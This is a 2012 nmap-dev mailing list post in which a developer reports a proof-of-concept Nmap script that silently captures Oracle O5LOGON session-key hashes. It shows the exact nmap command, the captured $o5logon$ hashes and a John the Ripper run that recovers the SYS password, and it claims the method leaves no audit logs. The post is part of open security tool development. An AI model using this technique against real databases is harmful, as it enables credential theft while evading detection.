Re: Script suggestion - oracle

[Dhiru Kholia <dhiru.kholia () gmail com>]

On Sat, Sep 29, 2012 at 10:40 PM, David Fifield <david () bamsoftware com> wrote:
> On Fri, Sep 28, 2012 at 10:59:14AM +0200, Martin Holst Swende wrote:
> > I took a look at this
> > http://marcel.vandewaters.nl/oracle/security/cryptographic-flaws-in-oracle-database-authentication-protocol
> >
> > Then checked tns.lua. Patrik has implemented TNS far enough it seems,
> > there is implementation support for enumerating users and getting the
> > salt (auth["AUTH_VFR_DATA"] ) and session key.
> >
> > As I interpret the info given above and in the comments on
> > http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today%27s+Most+Popular
> > ), it seems like the session key is encrypted with SHA1(salt+pw), and it
> > is possible to determine whether the decryption is correct or not, and
> > thereby determine what the password is.
> >
> > More info about this will probably be released soon, would be solid
> > script to add to NSE. Since enumeration is already implemented, a script
> > could just get all users and their passwords in one go. That's pretty
> > awesome.
>
> I made a script ideas entry for it.
>
> https://secwiki.org/w/Nmap/Script_Ideas#oracle-dump-hashes
>
> oracle-dump-hashes might not be the best name. I was thinking the script
> could just dump the keys or hashes or whatever, and an offline tool (or
> postrule script) could crack them.

I have written a NSE script for doing stealth attack against O5LOGON
protocol. This allows us to brute-force the session key(s) offline. I
have verified that using this script generates no alerts or logs on
the Oracle server.

Result of "select os_username, username, userhost, action_name,
returncode from dba_audit_session where action_name = 'LOGON' and
username = 'SYS' and returncode > 0 order by timestamp;" query is
constant when this script is used.

✗ cat ~/passdb
wrongpassword

✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args
oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb
192.168.2.253 --datadir .

Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST
sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
Nmap scan report for 192.168.2.253
Host is up (0.00033s latency).
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     No valid accounts found
|   Statistics
|_    Performed 2 guesses in 1 seconds, average tps: 2

Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

➜  src git:(unstable-jumbo) ✗ cat ~/hashes
sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3

➜  src git:(unstable-jumbo) ✗ ../run/john ~/hashes
Loaded 2 password hashes with 2 different salts (Oracle O5LOGON
protocol [32/64])
password         (sys)
password         (sys)
guesses: 2  time: 0:00:00:00 DONE (Sat Oct  6 13:04:44 2012)  c/s:
3772  trying: password
Use the "--show" option to display all of the cracked passwords reliably

JtR has guessed the correct password although the nmap script tried to
login with incorrect password (wrongpassword)!

This script is just a PoC. It needs tons of work before it can go in.
Can a Nmap developer fix and commit it?

-- 
Cheers,
Dhiru

Attachment: 0001-PoC-Oracle-O5LOGON-stealth-attack.patch.gz
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/